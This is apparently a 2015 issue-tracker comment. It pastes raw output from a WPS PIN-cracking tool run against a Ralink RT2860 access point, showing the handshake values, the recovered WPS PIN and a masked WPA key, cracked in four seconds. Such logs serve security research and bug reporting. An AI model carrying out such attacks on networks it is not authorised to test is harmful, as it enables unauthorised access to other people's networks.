[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: f8:75:2a:55:b1:dc:b2:cc:37:df:15:c9:3f:3e:e2:45
[P] PKE: 
93:90:0b:4b:4c:4e:c2:54:a0:0e:b3:f0:e9:b5:4b:b1:b0:5f:c9:89:df:65:ac:fd:16:3a:c7
:9a:4e:45:81:fc:c8:9c:35:a2:b2:cc:b0:c5:25:20:a6:36:f6:17:1a:5d:89:df:e3:8f:60:e
3:b2:3a:7a:48:91:73:37:3c:96:70:c3:56:9c:21:9b:b4:8e:41:fb:83:e9:11:ae:6b:37:af:
c1:38:75:1c:ab:36:99:ad:4d:ec:1e:60:40:0c:af:e4:09:3b:ec:00:7f:7d:8f:a8:33:59:86
:1a:f3:51:3e:fa:d4:3e:6e:05:34:3c:e5:ac:8a:cb:43:ce:46:fb:b9:17:2f:72:f3:a9:6b:b
6:85:10:fc:34:68:6b:b8:92:b6:08:12:0f:c1:f3:80:cf:a6:c0:3f:64:df:31:0c:5d:4b:ea:
8d:b4:26:0f:b0:5f:7e:69:1f:d1:d0:82:c5:65:e3:c2:9b:22:bc:07:15:5f:d2:b6:b2:00:26
:56:46:fa:9d:06
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Name: Ralink Wireless Access Point
[P] WPS Model Number: RT2860
[P] Access Point Serial Number: 12345678
[+] Received M1 message
[P] R-Nonce: 6f:a0:76:ca:9d:6f:d4:aa:0e:14:b6:f1:94:7a:55:28
[P] PKR: 
3b:09:7f:67:a3:0d:2c:fe:b6:12:79:ba:98:f1:09:35:72:dd:35:22:3f:2a:e6:da:14:f7:bf
:54:08:d9:a4:08:f2:72:6b:db:ce:2d:ce:e0:ec:05:09:f8:84:b9:4b:23:20:d5:9a:81:95:6
e:48:2b:ce:96:05:d2:5f:01:e3:30:de:b7:6a:89:ab:82:d2:12:02:fb:fe:89:7e:28:41:86:
49:91:18:51:63:6f:be:1d:6a:ec:cb:19:8a:ef:e4:44:b9:ea:48:d9:b5:0b:35:65:9e:81:c4
:89:c1:d9:83:21:8e:fd:2c:a4:03:1b:7b:be:cc:08:90:27:34:2f:a7:d3:7f:f1:99:d1:77:8
7:60:f0:5d:da:a4:6d:50:5a:c8:82:2b:a2:07:0d:56:0e:72:6e:8d:60:41:11:28:6e:3f:9e:
f7:2c:91:70:32:95:6f:d3:f5:fb:1a:cb:27:bc:09:b8:46:ef:4d:a2:30:d3:33:c9:90:2a:86
:3f:e5:b1:d4:2a
[P] AuthKey: 
1a:d8:5e:d9:83:8f:b9:a3:ca:95:e1:ab:2b:02:5f:0e:c6:57:fb:cd:92:19:51:57:3f:39:b4
:02:3f:af:0e:49
[+] Sending M2 message
[P] E-Hash1: 
7d:26:e8:f9:d2:e3:fe:e2:a4:f3:73:28:7a:c5:b0:2f:a7:e6:ec:94:5e:ca:87:59:fd:c2:cb
:f9:ba:e1:74:36
[P] E-Hash2: 
c3:ac:93:a1:05:f8:1a:d2:40:65:10:64:00:39:98:40:eb:0d:41:51:89:47:c6:69:85:a1:dc
:c5:1d:88:b0:08
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 4 seconds
[+] WPS PIN: '53460806'
[+] WPA PSK: 'XXXXXXXXXXXXX'
[+] AP SSID: 'WiFi'
[+] Nothing done, nothing to save.

Original comment by razorspe...@gmail.com on 21 Aug 2015 at 6:10